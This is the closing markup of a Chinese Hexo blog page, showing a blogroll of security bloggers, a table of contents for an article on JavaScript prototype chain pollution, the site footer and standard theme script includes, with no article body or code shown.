                    <a href="https://www.codemonster.cn/" title="Xishir" target="_blank">Xishir</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://eternalsakura13.com/" title="Sakura" target="_blank">Sakura</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://math1as.com/" title="Math1as" target="_blank">Math1as</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.thecosmos.cn/" title="Cosmos" target="_blank">Cosmos</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/whklhhhh" title="奈沙夜影" target="_blank">奈沙夜影</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/PeterZ1997/" title="PeterZ" target="_blank">PeterZ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virzz.com/" title="Virink" target="_blank">Virink</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.changwei.me/" title="昌维" target="_blank">昌维</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://white.xmutsec.com" title="White" target="_blank">White</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cismon.net/" title="CismonX" target="_blank">CismonX</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lsafe.org/" title="lixin" target="_blank">lixin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wzsite.cn/" title="Wz" target="_blank">Wz</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.blogsir.com.cn/" title="江sir" target="_blank">江sir</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://greyd0g.github.io/" title="greyd0g" target="_blank">greyd0g</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brucetg.github.io/" title="Brucetg" target="_blank">Brucetg</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.get1t.cn/" title="FraMeQ" target="_blank">FraMeQ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.smallflower.xin/" title="小花" target="_blank">小花</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://iosmosis.github.io/" title="iosmosis" target="_blank">iosmosis</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://processor.pub/" title="Processor" target="_blank">Processor</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lmxspace.com/" title="l1nk3r" target="_blank">l1nk3r</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.evi1s.com/index.php/links.html" title="Map1e" target="_blank">Map1e</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://pvp.im/" title="清枫" target="_blank">清枫</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.itfire.cn/" title="仓鼠" target="_blank">仓鼠</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.sk15.net/" title="一苇" target="_blank">一苇</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.t1h2ua.cn/" title="T1h2ua" target="_blank">T1h2ua</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#原型链污染攻击"><span class="nav-number">1.</span> <span class="nav-text">原型链污染攻击</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#我是谁？"><span class="nav-number">2.</span> <span class="nav-text">我是谁？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#计划（议程）"><span class="nav-number">3.</span> <span class="nav-text">计划（议程）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#介绍JavaScript"><span class="nav-number">4.</span> <span class="nav-text">介绍JavaScript</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#JavaScript中如何声明一个类"><span class="nav-number">4.1.</span> <span class="nav-text">JavaScript中如何声明一个类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#对象的基本原型"><span class="nav-number">4.2.</span> <span class="nav-text">对象的基本原型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#原型访问"><span class="nav-number">4.3.</span> <span class="nav-text">原型访问</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#原型链污染？"><span class="nav-number">5.</span> <span class="nav-text">原型链污染？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#原型链污染攻击-1"><span class="nav-number">6.</span> <span class="nav-text">原型链污染攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#如果攻击者能够向对象的原型添加属性，那么会发生什么？"><span class="nav-number">6.1.</span> <span class="nav-text">如果攻击者能够向对象的原型添加属性，那么会发生什么？</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#什么允许了原型链污染？"><span class="nav-number">7.</span> <span class="nav-text">什么允许了原型链污染？</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#合并-merge-操作"><span class="nav-number">7.1.</span> <span class="nav-text">合并(merge)操作</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#克隆-clone-操作"><span class="nav-number">7.2.</span> <span class="nav-text">克隆(clone)操作</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#路径分配操作"><span class="nav-number">7.3.</span> <span class="nav-text">路径分配操作</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用时间到了！"><span class="nav-number">8.</span> <span class="nav-text">利用时间到了！</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#鉴别身份"><span class="nav-number">8.1.</span> <span class="nav-text">鉴别身份</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#不要崩溃！"><span class="nav-number">8.2.</span> <span class="nav-text">不要崩溃！</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用！"><span class="nav-number">9.</span> <span class="nav-text">利用！</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#缓解"><span class="nav-number">10.</span> <span class="nav-text">缓解</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#GitHub"><span class="nav-number">11.</span> <span class="nav-text">GitHub</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cytosine</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  









<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>



  





  

  

  

  
  

  

  

  

</body>
</html>
